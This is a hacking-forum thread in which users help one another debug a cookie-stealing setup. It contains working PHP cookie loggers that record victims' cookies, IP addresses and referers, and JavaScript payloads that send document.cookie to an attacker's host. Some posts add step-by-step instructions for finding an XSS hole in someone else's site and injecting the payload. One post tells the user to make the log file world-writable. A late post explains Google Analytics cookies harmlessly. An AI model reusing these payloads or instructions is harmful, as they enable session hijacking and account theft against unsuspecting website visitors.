Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

Review my cookieLogger

  1. Home
  2. Forum
  3. Web hacking
  4. Review my cookieLogger

ghost's Avatar

ghost

0 0

My cookie logger wont work can someone tell me what i am doing wrong..

<?php $cookie = $HTTP_GET_VARS["cookie"]; $file = fopen('cookielog.txt', 'a'); fwrite($file, $cookie . "\n\n"); ?>

I save it as cookie.php

<script language="JavaScript"> document.location="http://www.host.com/xboxsomthing1.t35/cookie.php?cookie=" + document.cookie; </script>

i save it as cook.html and when i try it on myself it doesnt work. all i get in my .txt is blanks.

What am i doing wrong?


Uber0n's Avatar

Uber0n

Member
0 0

The first thing I see is a weird URL - are you sure this domain name is correct? :right:

markuphttp://www.host.com/xboxsomthing1.t35/cookie.php My recommendation if you want a good cookie logger is WhiteAcid's Community Cookie Logger (CCL).

http://ccl.whiteacid.org/


ghost's Avatar

ghost

0 0

lazydude2000 wrote: My cookie logger wont work can someone tell me what i am doing wrong..

[quote]<?php $cookie = $HTTP_GET_VARS["cookie"]; $file = fopen('cookielog.txt', 'a'); fwrite($file, $cookie . "\n\n"); ?>

I save it as cookie.php

<script language="JavaScript"> document.location="http://www.host.com/xboxsomthing1.t35/cookie.php?cookie=" + document.cookie; </script>

i save it as cook.html and when i try it on myself it doesnt work. all i get in my .txt is blanks.

What am i doing wrong?[/quote]

here is mine

<?php $cookie = $_GET['cookie']; $ip = getenv ('REMOTE_ADDR'); $date=date("j F, Y, g:i a");; $referer=getenv ('HTTP_REFERER'); $fp = fopen("cookies.txt", "a"); fwrite($fp, 'Cookie: '.$cookie.' IP: ' .$ip. ' Date and Time: ' .$date. ' Referer: '.$referer.''); fclose($fp); header ("Location:http://www.falling-midget.t35.com/hacked.html"); ?>

that logs the referer the ip the date and the cokie.

your url is so wierd. try <script>window.location='http://www.yourstealer.com/stealer.php' + document.cookie</script>


AldarHawk's Avatar

AldarHawk

The Manager
0 0

the problem is the txt file does not have write access on it from ALL. do a chmod 777 cookie.txt and you will be good :D


ghost's Avatar

ghost

0 0

Ok fallingmidget i tried yours

stupid question…when i click on the html i don't get a log but when i click on the php i get a log. Is it supose to do that?

Also i get this, i tried it on t35. so is it working ?

Cookie: IP: 75.73.180.165 Date and Time: 5 May, 2008, 5:31 pm Referer: http://freehostcp.t35.com/cp/index.php

I did the chomd thing

sorry for all of the stupid questions


ghost's Avatar

ghost

0 0

Anyone know why i am getting utmz utmcsr utma


Infam0us's Avatar

Infam0us

Member
0 0

lazydude2000 wrote: My cookie logger wont work can someone tell me what i am doing wrong..

[quote]<?php $cookie = $HTTP_GET_VARS["cookie"]; $file = fopen('cookielog.txt', 'a'); fwrite($file, $cookie . "\n\n"); ?>

I save it as cookie.php

<script language="JavaScript"> document.location="http://www.host.com/xboxsomthing1.t35/cookie.php?cookie=" + document.cookie; </script>

i save it as .html and when i try it on myself it doesnt work. all i get in my .txt is blanks.

What am i doing wrong?[/quote]

First off, change the http://www.host.com/xboxsomthing1.t35/cookie.php to a site that you are hosting that has php supported. Try t35.com and make a free subdomain. It looks to me like your cookie logger works like this..

  1. create a php document and name it cookielogger.php, and inside that php file put
$cookie = $HTTP_GET_VARS[&quot;cookie&quot;];	
$file = fopen(&#39;cookielog.txt&#39;, &#39;a&#39;);	
fwrite($file, $cookie . &quot;&#92;n&#92;n&quot;);	
?&gt;	```
and save it.

2) Make a TEXT file called cookielog.txt, and make it CHMOD 777. That is very important, in other words make it so that it is **writable** by the cookielogger.php.
3) Now heres where you have to put in work, find an xss hole in a website and insert the script 
```markup&lt;script language=&quot;JavaScript&quot;&gt;					document.location=&quot;http://www.**yourwebsite.com**/cookielogger.php?cookie=&quot; + document.cookie;	
&lt;/script&gt;	```
This script will redirect whoever see&#39;s the page you found the xss hole in to yoursite and will add there cookie to the end of the URL.  The php file just takes everything after &quot;?cookie=&quot; and puts it into a variable called $cookie and writes it to the file &quot;cookielog.txt&quot;.  Hope it helps, if your still confused you can pm me.

ghost's Avatar

ghost

0 0

lazydude2000 wrote: Anyone know why i am getting utmz utmcsr utma

The cookies

__utma __utmz

…and others are part of Google Analytics (Urchin module) and appear for every site that uses Google Analytics to see how it is being used.

More specifically:

* __utmz tracks where a visitor came from (search engine, search keyword, link) 

* __utma tracks each user&#39;s amount of visits, first and last visit. 

* __utmb and __utmc are used to track when a visit starts and ends. (C expires quickly) 

* __utmv is used for custom variables

Credit: http://helpful.knobs-dials.com/index.php/Utma,_utmb,_utmz_cookies


ghost's Avatar

ghost

0 0

Ok…

When i click on my html it don't get a cookie but when i click on my php file i get one. Is it suppose to do that because i thought when you click the html it goes to the php then gets the cookie.